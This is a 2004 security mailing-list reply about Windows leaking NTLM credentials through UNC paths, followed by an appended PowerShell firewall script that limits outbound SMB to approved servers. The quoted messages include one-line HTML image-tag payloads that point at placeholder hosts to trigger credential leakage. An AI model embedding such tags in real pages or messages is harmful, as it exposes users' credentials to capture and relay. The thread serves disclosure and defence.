Message-ID: <2310581523.20040929105242@SECURITY.NNOV.RU>
Date: Wed, 29 Sep 2004 10:52:42 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "Hidenobu Seki" <urity_friday@...mail.com>
Cc: full-disclosure@...ts.netsys.com, Secure@...rosoft.com,
   bugtraq@...urityfocus.com
Subject: Re[2]: Automatically passing NTLM authentication credentials on Windows XP


Dear Hidenobu Seki,

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

I have the same question. I had a discussion on this topic with the Microsoft
security team again just a few weeks ago (and 2 more discussions during the
last 4 years). They accepted this problem and have re-opened the case
(MSRC 5468lw) but gave no timelines for a solution. I think MS doesn't
understand the problem completely. For example, they still believe SMB
signing prevents NTLM relaying attacks, while SMB signing doesn't prevent
even the simplest port redirection, because the IP address is not signed.

Currently there is no way to mitigate this problem except filtering
outgoing NetBIOS and CIFS requests by implementing a domain-wide IP
Security policy to allow SMB and CIFS communication only with file
servers/domain controllers (if somebody is interested I can publish
step-by-step instructions, but I believe MS should publish a KB article
describing this configuration).

I don't think the problem reported by you is a different issue; it's just
another exploit scenario for the same problem. I know a few more tricks to
redirect a user to a UNC share.

--Wednesday, September 29, 2004, 5:43:15 AM, you wrote to 3APA3A@...URITY.NNOV.RU:

>>From: 3APA3A <3APA3A@...URITY.NNOV.RU>
>>
>>This  problem  is  known  since at least 1997 and still can be exploited
>>with   <IMG  SRC="\\w.x.y.z\fakeshare\fakefile">  without  any  MS  Word
>>document.

HS> It is not true.
HS> They are different problems that produce the same phenomenon.

HS> Mr. Cesar Cerrudo taught me that <img
HS> src=file://\\www.xxx.yyy\test> still 
HS> works.

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and 
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

HS> Kind regards,
HS> Urity




-- 
~/ZARAZA
A new type of elementary particle has been discovered: the shkvark.
Not very large, slightly burnt.  (Lem)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
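The mitigation 3APA3A describes above (let a workstation talk SMB/CIFS only to known file servers and domain controllers) can be expressed with Windows Defender Firewall rules instead of the IPsec policy he had in mind. The script below is an added example, not part of the original post or anything Microsoft published; it assumes the NetSecurity PowerShell module (Windows 8 / Server 2012 and later), an elevated prompt, and the placeholder server addresses in `$AllowedServers`. One detail matters: IPsec policy matching picks the most specific filter, so "block port 445" plus "permit 445 to these hosts" just works, whereas Windows Firewall lets an explicit Block rule win over an Allow rule. The block rule therefore has to carry the complement of the allow-list as its remote address ranges, which is what `Get-ComplementRanges` computes.

```powershell
# Added example (not from the original post): allow-list outbound SMB/NetBIOS
# on a domain-joined host. Addresses below are constructed placeholders; replace
# them with the real file servers and domain controllers.
$AllowedServers = @('10.0.0.10', '10.0.0.11', '10.0.0.20')
$SmbTcpPorts    = @(139, 445)   # NetBIOS session service, direct-hosted SMB
$NbtUdpPorts    = @(137, 138)   # NetBIOS name service and datagram service

# IPv4 dotted-quad -> 64-bit integer (kept as [long] so arithmetic never wraps)
function ConvertTo-IpNumber {
    param([string]$Ip)
    $bytes = [System.Net.IPAddress]::Parse($Ip).GetAddressBytes()
    if ($bytes.Length -ne 4) { throw "IPv4 address expected, got: $Ip" }
    return ([long]$bytes[0] -shl 24) -bor ([long]$bytes[1] -shl 16) -bor
           ([long]$bytes[2] -shl 8)  -bor  [long]$bytes[3]
}

# 64-bit integer -> IPv4 dotted-quad
function ConvertFrom-IpNumber {
    param([long]$N)
    return '{0}.{1}.{2}.{3}' -f (($N -shr 24) -band 255), (($N -shr 16) -band 255),
                                (($N -shr 8)  -band 255),  ($N -band 255)
}

# Build the "everything except these hosts" range list in the "start-end" form
# that New-NetFirewallRule -RemoteAddress accepts. Adjacent allowed addresses
# produce no empty range; an allow-list covering 0.0.0.0 or 255.255.255.255
# simply drops the corresponding end range.
function Get-ComplementRanges {
    param([string[]]$Allowed)
    $nums   = $Allowed | ForEach-Object { ConvertTo-IpNumber $_ } | Sort-Object -Unique
    $ranges = @()
    $cursor = 0L
    foreach ($n in $nums) {
        if ($n -gt $cursor) {
            $ranges += ('{0}-{1}' -f (ConvertFrom-IpNumber $cursor), (ConvertFrom-IpNumber ($n - 1)))
        }
        $cursor = $n + 1
    }
    if ($cursor -le 4294967295) {
        $ranges += ('{0}-{1}' -f (ConvertFrom-IpNumber $cursor), '255.255.255.255')
    }
    return $ranges
}

$BlockTargets = Get-ComplementRanges -Allowed $AllowedServers

# Explicit Allow to the approved servers. Redundant while the profile's default
# outbound action is Allow, but it keeps working if that default is later
# switched to Block.
New-NetFirewallRule -DisplayName 'SMB outbound - allow to file servers and DCs' `
    -Direction Outbound -Profile Domain -Protocol TCP -RemotePort $SmbTcpPorts `
    -RemoteAddress $AllowedServers -Action Allow

# Explicit Block to every other IPv4 address on the same ports. Because the
# address set excludes the allowed servers, this rule never matches them and
# cannot override the Allow rule above.
New-NetFirewallRule -DisplayName 'SMB outbound - block to all other hosts' `
    -Direction Outbound -Profile Domain -Protocol TCP -RemotePort $SmbTcpPorts `
    -RemoteAddress $BlockTargets -Action Block

# NetBIOS name/datagram traffic is only needed toward the same servers.
New-NetFirewallRule -DisplayName 'NetBIOS UDP outbound - block to all other hosts' `
    -Direction Outbound -Profile Domain -Protocol UDP -RemotePort $NbtUdpPorts `
    -RemoteAddress $BlockTargets -Action Block
```

Run with `-WhatIf` on the three `New-NetFirewallRule` calls first to see the rules without creating them. The post asks for a domain-wide policy; these cmdlets write to the local policy store by default, and the same calls can target a Group Policy object through the `-PolicyStore` parameter so the rules reach every workstation in the domain. The ranges only cover IPv4; a host that also speaks SMB over IPv6 needs a matching pair of rules with IPv6 addresses.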

